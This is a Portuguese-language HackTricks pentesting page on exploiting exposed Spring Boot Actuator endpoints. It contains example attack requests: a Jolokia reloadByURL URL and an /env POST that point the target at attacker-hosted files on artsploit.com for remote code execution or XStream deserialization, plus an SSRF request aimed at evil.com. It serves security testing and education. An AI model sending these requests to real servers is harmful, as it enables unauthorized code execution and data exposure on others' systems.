hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

5.7 KiB

Spring Actuators

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Burlando a Autenticação do Spring

De https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Explorando os Spring Boot Actuators

Verifique a postagem original em [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Pontos Chave:

  • Os Spring Boot Actuators registram endpoints como /health, /trace, /beans, /env, etc. Nas versões de 1 a 1.4, esses endpoints são acessíveis sem autenticação. A partir da versão 1.5, apenas /health e /info são não sensíveis por padrão, mas os desenvolvedores frequentemente desabilitam essa segurança.
  • Certos endpoints do Actuator podem expor dados sensíveis ou permitir ações prejudiciais:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart e /heapdump.
  • No Spring Boot 1.x, os actuators são registrados sob a URL raiz, enquanto no 2.x, eles estão sob o caminho base /actuator/.

Técnicas de Exploração:

  1. Execução Remota de Código via '/jolokia':
  • O endpoint /jolokia do actuator expõe a Biblioteca Jolokia, que permite acesso HTTP aos MBeans.
  • A ação reloadByURL pode ser explorada para recarregar configurações de log de uma URL externa, o que pode levar a XXE cego ou Execução Remota de Código via configurações XML manipuladas.
  • URL de exploit de exemplo: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
  1. Modificação de Configuração via '/env':
  • Se as Bibliotecas Spring Cloud estiverem presentes, o endpoint /env permite a modificação de propriedades ambientais.
  • As propriedades podem ser manipuladas para explorar vulnerabilidades, como a vulnerabilidade de desserialização XStream no serviceURL do Eureka.
  • Exemplo de solicitação POST de exploit:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Outras Configurações Úteis:
  • Propriedades como spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url e spring.datasource.tomcat.max-active podem ser manipuladas para vários exploits, como injeção de SQL ou alteração de strings de conexão de banco de dados.

Informações Adicionais:

  • Uma lista abrangente de actuators padrão pode ser encontrada aqui.
  • O endpoint /env no Spring Boot 2.x usa formato JSON para modificação de propriedades, mas o conceito geral permanece o mesmo.

Tópicos Relacionados:

  1. RCE Env + H2:
  • Detalhes sobre a exploração da combinação do endpoint /env e do banco de dados H2 podem ser encontrados aqui.
  1. SSRF no Spring Boot Através da Interpretação Incorreta de Nomes de Caminho:
  • O tratamento de parâmetros de matriz (;) pelo framework Spring em nomes de caminho HTTP pode ser explorado para Solicitação de Servidor-Side Request Forgery (SSRF).
  • Solicitação de exploit de exemplo:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: